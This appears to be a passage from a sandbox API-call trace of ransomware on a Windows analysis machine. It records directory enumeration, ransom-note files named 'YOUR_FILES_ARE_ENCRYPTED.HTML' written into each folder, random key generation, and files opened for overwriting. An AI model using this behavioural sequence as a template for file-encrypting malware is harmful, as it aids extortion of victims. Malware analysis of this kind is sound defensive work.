ftLastWriteTime.dwLowDateTime=0x6064f492, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.199] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.199] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory") returned 103 [0119.199] GetProcessHeap () returned 0x600000 [0119.199] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.199] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory" [0119.199] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\*" [0119.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6064f492, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6064f492, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0119.200] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6064f492, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6064f492, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.200] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6064f492, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6064f492, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 0 [0119.200] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0119.200] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0119.200] GetProcessHeap () returned 0x600000 [0119.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.200] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.201] CloseHandle (hObject=0x320) returned 1 [0119.201] GetProcessHeap () returned 0x600000 [0119.201] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.201] GetProcessHeap () returned 0x600000 [0119.201] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.202] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6da0d9db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6da0d9db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0119.202] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.202] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft") returned 101 [0119.202] GetProcessHeap () returned 0x600000 [0119.202] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.203] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft" [0119.203] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\*" [0119.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6da0d9db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6da0d9db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.203] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6da0d9db, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6da0d9db, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.203] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0119.203] StrStrIW (lpFirst="Internet Explorer", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.203] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer") returned 119 [0119.203] GetProcessHeap () returned 0x600000 [0119.203] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3104fd0 [0119.204] lstrcpyW (in: lpString1=0x3104fd0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer" [0119.204] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\*" [0119.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.204] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.204] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0119.204] StrStrIW (lpFirst="DOMStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.204] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore") returned 128 [0119.204] GetProcessHeap () returned 0x600000 [0119.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0119.206] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore" [0119.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\*" [0119.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.206] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.206] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6fa3d60b, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa3d60b, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa3d60b, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0119.206] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.206] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\container.dat") returned 142 [0119.206] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.206] lstrlenW (lpString=".dat") returned 4 [0119.206] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.206] SystemFunction036 (in: RandomBuffer=0x19d830, RandomBufferLength=0x20 | out: RandomBuffer=0x19d830) returned 1 [0119.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0119.207] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d854 | out: lpFileSize=0x19d854*=0) returned 1 [0119.207] CloseHandle (hObject=0x318) returned 1 [0119.207] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="G04B9NC8", cAlternateFileName="")) returned 1 [0119.207] StrStrIW (lpFirst="G04B9NC8", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.207] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8") returned 137 [0119.207] GetProcessHeap () returned 0x600000 [0119.207] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x680348 [0119.208] lstrcpyW (in: lpString1=0x680348, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8" [0119.208] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8\\*" [0119.208] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.208] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0119.208] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x25000025, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 0 [0119.208] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.208] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 167 [0119.208] GetProcessHeap () returned 0x600000 [0119.208] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\G04B9NC8\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\microsoft\\internet explorer\\domstore\\g04b9nc8\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0119.209] WriteFile (in: hFile=0x318, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0119.210] CloseHandle (hObject=0x318) returned 1 [0119.210] GetProcessHeap () returned 0x600000 [0119.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.210] GetProcessHeap () returned 0x600000 [0119.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0119.210] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6fa637de, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6fa637de, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x630488, dwReserved1=0x63d098, cFileName="KPTCCOJ4", cAlternateFileName="")) returned 1 [0119.210] StrStrIW (lpFirst="KPTCCOJ4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.210] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4") returned 137 [0119.210] GetProcessHeap () returned 0x600000 [0119.210] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x680348 [0119.210] lstrcpyW (in: lpString1=0x680348, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4" [0119.210] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4\\*" [0119.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\Microsoft\\Internet Explorer\\DOMStore\\KPTCCOJ4\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6fa637de, ftCreationTime.dwHighDateTime=0x1d7006c, 